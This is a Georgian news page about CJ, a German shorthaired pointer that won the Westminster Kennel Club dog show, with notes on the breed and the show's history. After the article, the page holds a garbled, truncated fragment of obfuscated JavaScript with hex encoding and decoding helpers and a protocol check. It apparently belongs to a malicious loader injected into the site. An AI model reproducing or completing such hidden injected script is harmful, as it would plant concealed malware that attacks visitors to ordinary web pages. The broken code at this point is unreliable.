აშშ-ში საუკეთესო ძაღლი აირჩიეს
აშშ-ში საუკეთესო ძაღლი აირჩიეს
ამერიკაში დოგ-შოუ Westminster Kennel Club-ის გამარჯვებული გერმანული მოკლებეწვიანი პოინტერი, სახელად სიჯეი გახდა.

სამი წლის სიჯეი (CJ) ნიუ-იორკში კონკურსზე პატრონთან ერთად კალიფორნიიდან ჩავიდა. პატრონის თქმით, მისი სახელი იშიფრება, როგორც California Journey (მოგზაურობა კალიფორნიაში).


ძაღლს “ამერიკის ძაღლის" (America's Dog) წოდება მიანიჭეს მთელი მომდევნო წლის განმავლობაში. ცხოველი სხვადასხვა ფოტოსესიასა და ტელეშოუში მიიღებს მონაწილეობას. ჩემპიონმა ჯილდოდ ვერცხლის ჯამი მიიღო. მას ასევე შესთავაზებენ სტეიკს ნიუ-იორკის ერთ-ერთ საუკეთესო რესტორანში. შეჯიბრის პირობების თანახმად, არანაირი ფულადი ჯილდო პატრონებისთვის არაა გათვალისწინებული.

მეორე ადგილზე გავიდა გრეიჰაუნდი, სახელად ლუსი. კონკურსში 2
700 ძაღლზე მეტი მონაწილეობდა. მათ შორის იყვნენ: გერმანული ნაგაზები, ბულდოგები, ში-ცუ და სკაიტერიერები.

გერმანული პოინტერები
ასევე ცნობილები არიან, როგორც მოკლებეწვიანი პოინტერები. პირველად ისინი გერმანიაში მეოცე საუკუნის დასაწყისში შეიყვანეს. ამ ჯიშს ასევე უწოდებენ კურცჰაარის (გერმანულიდან kurz haar - “მოკლე ბეწვი”).
ეს გამძლე და აქტიური ძაღლი გამოიყენება ფრინველებსა და პატარა ცხოველებზე ნადირობისთვის. Westminster Kennel Club-ის კონკურსში 140-წლიანი ისტორიის მანძილზე გერმანულმა პოინტერმა უკვე სამჯერ გაიმარჯვა.


Westminster Kennel Club Show ნიუ-იორკში 1877 წლიდან იმართება. Kentucky Derby-ის დოღის შემდეგ ეს ყველაზე ძველი შეჯიბრია ამერიკაში. თავიდან მასში მონაწილეობას იღებდნენ მხოლოდ მონადირე, ძირითადად სეტერისა და პოინტერის ჯიშის ძაღლები, მაგრამ ნელ-ნელა მონაწილეთა სია გაიზარდა. 1948 წლიდან კონკურსის ტრანსლიაცია პირდაპირ ეთერში მიმდინარეობს.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?